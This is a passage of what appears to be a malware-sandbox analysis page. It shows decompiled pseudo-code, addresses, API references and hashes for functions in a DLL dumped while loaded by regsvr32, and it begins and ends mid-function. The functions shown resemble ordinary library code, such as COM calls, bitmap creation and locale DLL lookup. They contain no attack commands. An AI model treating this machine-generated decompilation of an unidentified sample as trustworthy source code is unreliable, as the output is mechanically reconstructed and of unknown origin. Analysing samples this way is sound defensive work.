				 *((intOrPtr*)(_t263 - 0x80)) =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t133 =  *((intOrPtr*)(__ecx + 8));
					if(_t133 != 0) {
						_push(_t263 - 0x7c);
						_push(_t263 - 0x78);
						_push(0x1002fb58);
						_push(_t133);
						if( *((intOrPtr*)( *_t133 + 0xc))() >= 0) {
							E1000B58F(_t263 - 0x70, 0x100301e4);
							 *(_t263 - 0x50) =  *(_t263 - 0x50) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x58)) = 0;
							 *((intOrPtr*)(_t263 - 0x54)) = 0;
							 *((intOrPtr*)(_t263 - 0x4c)) = 0x18;
							 *((intOrPtr*)(_t263 - 0x48)) = 0;
							 *((intOrPtr*)(_t263 - 0x44)) = 0x1fb;
							E1000B58F(_t263 - 0x40, 0x100301cc);
							_t140 =  *((intOrPtr*)(_t263 - 0x78));
							 *(_t263 - 0x20) =  *(_t263 - 0x20) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x28)) = 0x1c;
							 *((intOrPtr*)(_t263 - 0x24)) = 0;
							 *((intOrPtr*)(_t263 - 0x1c)) = 0x20;
							 *((intOrPtr*)(_t263 - 0x18)) = 0;
							 *((intOrPtr*)(_t263 - 0x14)) = 0x1e;
							_t196 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, 2, _t263 - 0x70, 0x28, 0);
							if(_t196 >= 0) {
								 *(_t263 - 0xa0) =  *(_t263 - 0x7c);
								_t143 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)(_t263 - 0x9c)) = 1;
								 *(_t263 - 0x98) = 0;
								 *((intOrPtr*)(_t263 - 0x94)) = 0;
								 *((intOrPtr*)(_t263 - 0x90)) = 0;
								_t144 =  *((intOrPtr*)( *_t143 + 0x18))(_t143, 0, 0, _t263 - 0xa0);
								 *((intOrPtr*)(_t263 - 0x84)) = _t144;
								if(_t144 >= 0) {
									 *(_t261 + 0x14) =  *(_t263 - 0x98);
									_t146 =  *(_t263 - 0x8c);
									 *(_t263 - 0x7c) = _t146;
									 *(_t261 + 0x10) = _t146;
									_t147 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)(_t261 + 0x34)) =  *((intOrPtr*)(_t263 - 0x94));
									 *((intOrPtr*)( *_t147 + 8))(_t147);
									goto L23;
								} else {
									_t161 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)( *_t161 + 8))(_t161);
								}
								goto L41;
							} else {
								_t163 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t163 + 8))(_t163);
								_t134 = _t196;
							}
						}
					} else {
						_t134 = 0;
					}
				} else {
					_t165 =  *((intOrPtr*)(__ecx + 0x4c));
					_t134 =  *((intOrPtr*)( *_t165 + 0x14))(_t165, 0x1002fcc8, _t263 - 0x74);
					 *((intOrPtr*)(_t263 - 0x84)) = _t134;
					if(_t134 >= 0) {
						_t166 =  *((intOrPtr*)(_t263 - 0x74));
						_push(_t263 - 0x7c);
						_push(0x1002fca8);
						_push(_t166);
						if( *((intOrPtr*)( *_t166))() >= 0) {
							_t186 =  *(_t263 - 0x7c);
							_push(_t263 - 0x78);
							_push(0x1002fde8);
							 *((intOrPtr*)(_t263 - 0x78)) = 0;
							_push(_t186);
							if( *((intOrPtr*)( *_t186 + 0x10))() >= 0) {
								_t190 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t190 + 0x14))(_t190,  *((intOrPtr*)(__ecx + 4)) + 0xe4, __ecx + 0x58);
								_t192 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t192 + 8))(_t192);
							}
							_t188 =  *(_t263 - 0x7c);
							 *((intOrPtr*)( *_t188 + 8))(_t188);
						}
						if(E1001F51F(0x14) == 0) {
							_t169 = 0;
						} else {
							_t169 = E1000D436(_t168,  *((intOrPtr*)(_t263 - 0x74)));
						}
						 *((intOrPtr*)(_t261 + 0x50)) = _t169;
						_t170 =  *((intOrPtr*)(_t263 - 0x74));
						 *((intOrPtr*)( *_t170 + 8))(_t170);
						_t172 =  *((intOrPtr*)(_t261 + 0x50));
						_t229 =  *_t172;
						if( *_t172 != 0) {
							E1000B80D(_t229, _t172 + 4);
						}
						if(E1001F51F(0x28) == 0) {
							_t174 = 0;
						} else {
							_t174 = E1000A256(_t173, 0, 0x1f40);
						}
						 *((intOrPtr*)(_t261 + 0x54)) = _t174;
						E1000DF4C(_t174);
						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)) + 8)) =  *((intOrPtr*)(_t261 + 0x54));
						_t178 =  *( *((intOrPtr*)(_t261 + 0x54)) + 0xc);
						 *(_t261 + 0x10) = _t178;
						_t180 = _t178 + _t178 * 4 << 3;
						__imp__CoTaskMemAlloc(_t180,  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)))));
						 *(_t261 + 0x14) = _t180;
						E10012400(_t180, 0,  *(_t261 + 0x10) +  *(_t261 + 0x10) * 4 << 3);
						E1000DE36( *((intOrPtr*)(_t261 + 0x50)));
						E1000B7CA( *((intOrPtr*)(_t261 + 0x50)));
						L23:
						 *((intOrPtr*)(_t263 - 0x74)) = 0;
						if( *(_t261 + 0x10) > 0) {
							_t200 = 0;
							do {
								_t158 = E1001F51F(0x1c);
								 *(_t263 - 0x7c) = _t158;
								 *(_t263 - 4) = 0;
								if(_t158 == 0) {
									_t159 = 0;
								} else {
									_t159 = E1001D93B(_t158, 0xa);
								}
								 *(_t263 - 4) =  *(_t263 - 4) | 0xffffffff;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x74)) + 1;
								 *((intOrPtr*)(_t200 +  *(_t261 + 0x14) + 0x24)) = _t159;
								_t200 = _t200 + 0x28;
							} while ( *((intOrPtr*)(_t263 - 0x74)) <  *(_t261 + 0x10));
						}
						_t198 =  *((intOrPtr*)(_t263 - 0x88));
						if(_t198 != 0) {
							if( *((intOrPtr*)(_t263 - 0x80)) > 0) {
								_t149 = 0xffffffdc;
								_t199 = _t198 + 0x24;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x80));
								 *(_t263 - 0x7c) = _t149 -  *((intOrPtr*)(_t263 - 0x88));
								while(1) {
									_t213 =  *((intOrPtr*)( *_t199 + 4));
									 *((intOrPtr*)(_t263 - 0x80)) = _t213;
									if(_t213 == 0) {
										goto L37;
									}
									while(1) {
										_t153 = E10007404(_t263 - 0x80);
										 *((intOrPtr*)( *_t261 + 8))( *_t153, 1);
										if( *((intOrPtr*)(_t263 - 0x80)) == 0) {
											goto L37;
										}
									}
									L37:
									E1001D876( *_t199);
									_t215 =  *_t199;
									if(_t215 != 0) {
										 *((intOrPtr*)( *_t215 + 4))(1);
									}
									_t199 = _t199 + 0x28;
									_t122 = _t263 - 0x74;
									 *_t122 =  *((intOrPtr*)(_t263 - 0x74)) - 1;
									if( *_t122 != 0) {
										continue;
									}
									goto L40;
								}
							}
							L40:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t263 - 0x88)));
						}
						L41:
						_t134 =  *((intOrPtr*)(_t263 - 0x84));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0xc));
				return E10011A49(_t134,  *((intOrPtr*)(_t263 - 0x10)));
			}

0x1000e521
0x1000e52c
0x1000e533
0x1000e535
0x1000e53c
0x1000e54a
0x1000e54d
0x1000e67a
0x1000e67f
0x1000e68d
0x1000e691
0x1000e692
0x1000e697
0x1000e69d
0x1000e6ae
0x1000e6b3
0x1000e6c2
0x1000e6c5
0x1000e6c8
0x1000e6cf
0x1000e6d2
0x1000e6d9
0x1000e6de
0x1000e6e1
0x1000e6ee
0x1000e6f5
0x1000e6f8
0x1000e6ff
0x1000e702
0x1000e70f
0x1000e713
0x1000e732
0x1000e738
0x1000e73e
0x1000e748
0x1000e74e
0x1000e754
0x1000e75d
0x1000e762
0x1000e768
0x1000e784
0x1000e787
0x1000e78d
0x1000e790
0x1000e793
0x1000e796
0x1000e79c
0x00000000
0x1000e76a
0x1000e76a
0x1000e770
0x1000e770
0x00000000
0x1000e715
0x1000e715
0x1000e71b
0x1000e71e
0x1000e71e
0x1000e713
0x1000e681
0x1000e681
0x1000e681
0x1000e553
0x1000e553
0x1000e562
0x1000e567
0x1000e56d
0x1000e573
0x1000e57b
0x1000e57c
0x1000e581
0x1000e586
0x1000e588
0x1000e58e
0x1000e58f
0x1000e594
0x1000e599
0x1000e59f
0x1000e5a1
0x1000e5b5
0x1000e5b8
0x1000e5be
0x1000e5be
0x1000e5c1
0x1000e5c7
0x1000e5c7
0x1000e5d4
0x1000e5e2
0x1000e5d6
0x1000e5db
0x1000e5db
0x1000e5e4
0x1000e5e7
0x1000e5ed
0x1000e5f0
0x1000e5f3
0x1000e5f7
0x1000e5fe
0x1000e5fe
0x1000e60d
0x1000e61e
0x1000e60f
0x1000e617
0x1000e617
0x1000e623
0x1000e62a
0x1000e635
0x1000e63b
0x1000e63e
0x1000e644
0x1000e648
0x1000e65a
0x1000e65d
0x1000e668
0x1000e670
0x1000e79f
0x1000e7a2
0x1000e7a5
0x1000e7a7
0x1000e7a9
0x1000e7ab
0x1000e7b1
0x1000e7b6
0x1000e7b9
0x1000e7c6
0x1000e7bb
0x1000e7bf
0x1000e7bf
0x1000e7c8
0x1000e7cf
0x1000e7d2
0x1000e7d9
0x1000e7dc
0x1000e7a9
0x1000e7e1
0x1000e7e9
0x1000e7ee
0x1000e7f5
0x1000e7f6
0x1000e7ff
0x1000e802
0x1000e80a
0x1000e80c
0x1000e811
0x1000e814
0x00000000
0x00000000
0x1000e81b
0x1000e828
0x1000e836
0x1000e83c
0x00000000
0x00000000
0x1000e818
0x1000e83e
0x1000e840
0x1000e845
0x1000e849
0x1000e84f
0x1000e84f
0x1000e852
0x1000e855
0x1000e855
0x1000e858
0x00000000
0x1000e807
0x00000000
0x1000e858
0x1000e80a
0x1000e85a
0x1000e860
0x1000e860
0x1000e866
0x1000e866
0x1000e866
0x1000e56d
0x1000e871
0x1000e882

APIs

__EH_prolog.LIBCMT ref: 1000E521
CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 1000E648
CoTaskMemFree.OLE32(?,?,00000000), ref: 1000E860

Strings

, xrefs: 1000E6F8

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Task$AllocFreeH_prolog
String ID:
API String ID: 1522537378-3916222277
Opcode ID: 7984054ffb1da2621cab150e098b40a3d144c49dc56001520108efcfd34a23e8
Instruction ID: 6f949c1b0ac458bb1f1f724c38c51bef9759c86c0bbd1da9e935ed9f44a5127e
Opcode Fuzzy Hash: 7984054ffb1da2621cab150e098b40a3d144c49dc56001520108efcfd34a23e8
Instruction Fuzzy Hash: 0AC11874A006489FEB24CFA8C884AADB7F5FF88344F20855DE54AEB256DB71AD45CF10

Uniqueness

Uniqueness Score: -1.00%

Function 1000BAC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1000BAC2(void* __ecx) {
				intOrPtr* _t76;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t143;
				void* _t146;
				void* _t148;

				E10011A8C(E1002ABC8, _t148);
				_t146 = __ecx;
				_t76 =  *((intOrPtr*)(__ecx + 0x4c));
				_push(_t148 - 0x14);
				_push(0x1002fbc8);
				 *((intOrPtr*)(_t148 - 0x14)) = 0;
				_push(_t76);
				 *((intOrPtr*)(_t148 - 0x18)) = 0;
				if( *((intOrPtr*)( *_t76))() >= 0) {
					 *((intOrPtr*)(_t148 - 0x7c)) = __ecx + 0xc4;
					 *((intOrPtr*)(_t148 - 0x74)) = __ecx + 0xd4;
					 *((intOrPtr*)(_t148 - 0x70)) = __ecx + 0xd8;
					 *((intOrPtr*)(_t148 - 0x80)) = 0x40;
					 *((intOrPtr*)(_t148 - 0x78)) = 0;
					 *((intOrPtr*)(_t148 - 0x5c)) = 0;
					 *((intOrPtr*)(_t148 - 0x50)) = 0;
					 *((intOrPtr*)(_t148 - 0x4c)) = 0;
					E1001064A(_t148 - 0x28);
					_t143 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) + 0x1c));
					 *((intOrPtr*)(_t148 - 4)) = 0;
					 *(_t148 - 0x6c) = 0;
					 *((intOrPtr*)(_t148 - 0x10)) = 0;
					do {
						 *((intOrPtr*)( *_t143 + 0x104))(_t146,  *((intOrPtr*)( *((intOrPtr*)(_t148 - 0x10)) + 0x1002d938)), _t148 - 0x28);
						if( *((intOrPtr*)(_t148 - 0x20)) != 0) {
							 *(_t148 - 0x6c) =  *(_t148 - 0x6c) |  *( *((intOrPtr*)(_t148 - 0x10)) + 0x1002d93c);
						}
						 *((intOrPtr*)(_t148 - 0x10)) =  *((intOrPtr*)(_t148 - 0x10)) + 8;
					} while ( *((intOrPtr*)(_t148 - 0x10)) < 0x40);
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd40, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x68)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd43, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x64)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd34, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x58)) =  *((short*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd3f, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x54)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd41, _t148 - 0x28);
					_t101 =  *((intOrPtr*)(_t148 - 0x20));
					_push(_t148 - 0x60);
					_push(0x1002fc18);
					_push(_t101);
					if( *((intOrPtr*)( *_t101))() < 0) {
						 *((intOrPtr*)(_t148 - 0x60)) = 0;
					}
					_t103 =  *((intOrPtr*)(_t148 - 0x14));
					_push(_t148 - 0x40);
					_push(_t148 - 0x80);
					 *((intOrPtr*)(_t148 - 0x40)) = 0x18;
					_push(_t103);
					if( *((intOrPtr*)( *_t103 + 0xc))() >= 0) {
						 *((intOrPtr*)(_t146 + 0x6c)) =  *((intOrPtr*)(_t148 - 0x3c));
						 *((intOrPtr*)(_t146 + 0x5c)) =  *((intOrPtr*)(_t148 - 0x34));
						 *((intOrPtr*)(_t146 + 0x60)) =  *((intOrPtr*)(_t148 - 0x30));
						 *((intOrPtr*)(_t148 - 0x18)) = 1;
					}
					_t105 =  *((intOrPtr*)(_t148 - 0x14));
					 *((intOrPtr*)( *_t105 + 8))(_t105);
					_t107 =  *((intOrPtr*)(_t148 - 0x60));
					if(_t107 != 0) {
						 *((intOrPtr*)( *_t107 + 8))(_t107);
					}
					__imp__#9(_t148 - 0x28);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t148 - 0xc));
				return  *((intOrPtr*)(_t148 - 0x18));
			}

0x1000bac7
0x1000bad4
0x1000bad6
0x1000bad9
0x1000badc
0x1000bae1
0x1000bae6
0x1000bae7
0x1000baee
0x1000bafa
0x1000bb03
0x1000bb0c
0x1000bb14
0x1000bb1b
0x1000bb1e
0x1000bb21
0x1000bb24
0x1000bb27
0x1000bb2f
0x1000bb32
0x1000bb35
0x1000bb38
0x1000bb3b
0x1000bb4d
0x1000bb57
0x1000bb62
0x1000bb62
0x1000bb65
0x1000bb69
0x1000bb7d
0x1000bb8f
0x1000bb97
0x1000bba9
0x1000bbb1
0x1000bbc4
0x1000bbcc
0x1000bbde
0x1000bbe6
0x1000bbec
0x1000bbf4
0x1000bbf5
0x1000bbfa
0x1000bc00
0x1000bc02
0x1000bc02
0x1000bc05
0x1000bc0b
0x1000bc0f
0x1000bc10
0x1000bc19
0x1000bc1f
0x1000bc24
0x1000bc2a
0x1000bc30
0x1000bc33
0x1000bc33
0x1000bc3a
0x1000bc40
0x1000bc43
0x1000bc48
0x1000bc4d
0x1000bc4d
0x1000bc54
0x1000bc54
0x1000bc62
0x1000bc6a

APIs

__EH_prolog.LIBCMT ref: 1000BAC7
VariantClear.OLEAUT32(?), ref: 1000BC54

Strings

@, xrefs: 1000BB14
@, xrefs: 1000BB69

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClearH_prologVariant
String ID: @$@
API String ID: 1166855276-149943524
Opcode ID: 6aaaa31fd4c3ac7e832f08c54c50d4dd872d17614035c5eb8da97c9537ba3532
Instruction ID: 8413621b418a9e557432ec25b9ac0905e245df0d8dbf75b72d1ba3b7849b3774
Opcode Fuzzy Hash: 6aaaa31fd4c3ac7e832f08c54c50d4dd872d17614035c5eb8da97c9537ba3532
Instruction Fuzzy Hash: DA51D5B1A002199FDB04CFA8C8849EEBBF9FF48304F14456EE506EB250E774A945CF60

Uniqueness

Uniqueness Score: -1.00%

Function 10027331 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E10027331(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t24;
				unsigned int _t25;
				int _t31;
				signed int _t38;
				struct HBITMAP__* _t40;
				int _t43;
				int _t45;
				void* _t48;
				signed int* _t52;
				signed int _t57;
				signed int _t61;
				void* _t62;
				void* _t64;
				void* _t66;

				_t48 = __edx;
				_t64 = _t66 - 0x78;
				_t24 =  *0x100371f4; // 0x39cf7dc9
				 *((intOrPtr*)(_t64 + 0x74)) = _t24;
				_t25 = GetMenuCheckMarkDimensions();
				_t43 = _t25;
				_t45 = _t25 >> 0x10;
				 *(_t64 - 0x18) = _t45;
				if(_t43 > 0x20) {
					_t43 = 0x20;
				}
				_t4 = _t43 - 4; // 0x1c
				asm("cdq");
				_t5 = _t43 + 0xf; // 0x2f
				_t61 = _t5 >> 4;
				_t57 = (_t4 - _t48 >> 1) + (_t61 << 4) - _t43;
				if(_t57 > 0xc) {
					_t57 = 0xc;
				}
				_t31 = 0x20;
				if(_t45 > _t31) {
					 *(_t64 - 0x18) = _t31;
				}
				E10012400(_t64 - 0xc, 0xff, 0x80);
				_t52 = _t64 + ( *(_t64 - 0x18) - 6 >> 1) * _t61 * 2 - 0xc;
				 *(_t64 - 0x10) = 0x1002be78;
				_t62 = _t61 + _t61;
				 *((intOrPtr*)(_t64 - 0x14)) = 5;
				do {
					 *(_t64 - 0x10) =  &(( *(_t64 - 0x10))[1]);
					_t38 =  !(( *( *(_t64 - 0x10)) & 0x000000ff) << _t57);
					 *_t52 = _t38;
					_t52[0] = _t38;
					_t52 = _t52 + _t62;
					_t19 = _t64 - 0x14;
					 *_t19 =  *((intOrPtr*)(_t64 - 0x14)) - 1;
				} while ( *_t19 != 0);
				_t40 = CreateBitmap(_t43,  *(_t64 - 0x18), 1, 1, _t64 - 0xc);
				 *0x1003a0e0 = _t40;
				if(_t40 == 0) {
					 *0x1003a0e0 = _t40;
				}
				return E10011A49(_t40,  *((intOrPtr*)(_t64 + 0x74)));
			}

0x10027331
0x10027332
0x1002733c
0x10027344
0x10027347
0x1002734d
0x10027356
0x10027359
0x1002735c
0x10027360
0x10027360
0x10027361
0x10027364
0x10027367
0x1002736a
0x10027378
0x1002737d
0x10027381
0x10027381
0x10027384
0x10027387
0x10027389
0x10027389
0x1002739a
0x100273ad
0x100273b1
0x100273b8
0x100273ba
0x100273c1
0x100273cc
0x100273cf
0x100273d1
0x100273d3
0x100273d6
0x100273d8
0x100273d8
0x100273d8
0x100273e9
0x100273f3
0x100273f9
0x10027407
0x10027407
0x10027418

APIs

GetMenuCheckMarkDimensions.USER32 ref: 10027347
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100273E9
LoadBitmapA.USER32 ref: 10027401

Strings

, xrefs: 10027353

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: 61b8a6ea2f17090497b63910f8532d18b4b53824e18819d7300cbcfb591eeebb
Instruction ID: deb4626aaa7cae345da9a6d3d66d22e9dbe08d2c12093e9aa6a7ce030dca17ca
Opcode Fuzzy Hash: 61b8a6ea2f17090497b63910f8532d18b4b53824e18819d7300cbcfb591eeebb
Instruction Fuzzy Hash: CE212772E002169FEB10CFA8DCC5AAEBBB9FB44300F144526E905EB291D7709A45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10026C40 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E10026C40(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				char _v276;
				intOrPtr _t10;
				long _t12;
				void* _t13;
				CHAR* _t16;
				void* _t30;
				void* _t33;

				_t10 =  *0x100371f4; // 0x39cf7dc9
				_v8 = _t10;
				_t12 = GetModuleFileNameA( *(__ecx + 0x40),  &_v276, 0x104);
				if(_t12 == 0 || _t12 == 0x104) {
					L4:
					_t13 = 0;
				} else {
					_push(__esi);
					_push(__edi);
					_t16 = PathFindExtensionA( &_v276);
					asm("movsd");
					asm("movsw");
					asm("movsb");
					_pop(_t30);
					_pop(_t33);
					if(_t16 -  &_v276 + 7 > 0x104) {
						goto L4;
					} else {
						lstrcpyA(_t16,  &_v16);
						_t13 = E1002695A(0x104, _t30, _t33,  &_v276);
					}
				}
				return E10011A49(_t13, _v8);
			}

0x10026c49
0x10026c4f
0x10026c62
0x10026c6a
0x10026cb7
0x10026cb7
0x10026c70
0x10026c70
0x10026c71
0x10026c79
0x10026c87
0x10026c88
0x10026c94
0x10026c9a
0x10026c9b
0x10026c9c
0x00000000
0x10026c9e
0x10026ca3
0x10026cb0
0x10026cb0
0x10026c9c
0x10026cc3

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10026C62
PathFindExtensionA.SHLWAPI(?), ref: 10026C79
lstrcpyA.KERNEL32(00000000,?), ref: 10026CA3

Part of subcall function 1002695A: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1002697D
Part of subcall function 1002695A: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10026988
Part of subcall function 1002695A: ConvertDefaultLocale.KERNEL32(?), ref: 100269B9
Part of subcall function 1002695A: ConvertDefaultLocale.KERNEL32(?), ref: 100269C1
Part of subcall function 1002695A: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100269CE
Part of subcall function 1002695A: ConvertDefaultLocale.KERNEL32(?), ref: 100269E8
Part of subcall function 1002695A: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100269EE

Strings

%s.dll, xrefs: 10026C7F

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
String ID: %s.dll
API String ID: 4178508759-3668843792
Opcode ID: e8c980b1039220e988ec9f22b9c2f2a1de109ad4e605125d8e761b797a12fc31
Instruction ID: fe4ede24a9b99154f839b1d0cfe838e7aebc8168d852c36c17edc46dfd30288e
Opcode Fuzzy Hash: e8c980b1039220e988ec9f22b9c2f2a1de109ad4e605125d8e761b797a12fc31
Instruction Fuzzy Hash: A601487590011DABDB19EBA4DC869FE77BCFB4C304F5445B9EA15E3100D6B09A498B50

Uniqueness

Uniqueness Score: -1.00%

Function 10019F98 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E10019F98(void* __eflags) {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_push(0x10);
				_push(0x1002f940);
				E10012CE0(_t13, _t14, _t15);
				_t9 =  *0x1003a614;
				if(_t9 == 0) {
					if( *0x1003a174 == 1) {
						L4:
						_t9 = E10019F88;
						 *0x1003a614 = E10019F88;
					} else {
						_t12 = GetModuleHandleA("kernel32.dll");
						if(_t12 == 0) {
							goto L4;
						} else {
							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
							 *0x1003a614 = _t9;
							if(_t9 == 0) {
								goto L4;
							}
						}
					}
				}
				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
				return E10012D1B(_t10);
			}

0x10019f98
0x10019f9a
0x10019f9f
0x10019fa4
0x10019fab
0x10019fb4
0x10019fda
0x10019fda
0x10019fdf
0x10019fb6
0x10019fbb
0x10019fc3
0x00000000
0x10019fc5
0x10019fcb
0x10019fd1
0x10019fd8
0x00000000
0x00000000
0x10019fd8
0x10019fc3
0x10019fb4
0x10019fe4
0x10019ff0
0x1001a019
0x1001a022

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,1002F940,00000010,10014C8F,00000000,00000FA0,1002EB78,00000008,10014CF7,?,?,?,100143E9,0000000D,1002E968,00000010), ref: 10019FBB
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 10019FCB

Strings

InitializeCriticalSectionAndSpinCount, xrefs: 10019FC5
kernel32.dll, xrefs: 10019FB6

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 1646373207-3733552308
Opcode ID: 7b6102adf88afe27ab1b66b00692691c4c0e6c3a29a4adb24f3e892c881cca1b
Instruction ID: e989f7d5d44f7413eed177191cab4c32822d07402e6d3f292b4702f0490579e7
Opcode Fuzzy Hash: 7b6102adf88afe27ab1b66b00692691c4c0e6c3a29a4adb24f3e892c881cca1b
Instruction Fuzzy Hash: 89F03A74A00216BBEB11CFA08D49B8C3AE4EB25795B500129E511EE171D738D6C29B65

Uniqueness

Uniqueness Score: -1.00%

Function 10018F16 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E10018F16() {
				signed int _v12;
				signed long long _v20;
				signed long long _v28;
				signed char _t9;

				_t9 = GetModuleHandleA("KERNEL32");
				if(_t9 == 0) {
					L6:
					_v12 =  *0x1002f748;
					_v20 =  *0x1002f740;
					asm("fsubr qword [ebp-0x10]");
					_v28 = _v20 / _v12 * _v12;
					asm("fcomp qword [0x1002f738]");
					asm("fnstsw ax");
					if((_t9 & 0x00000041) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
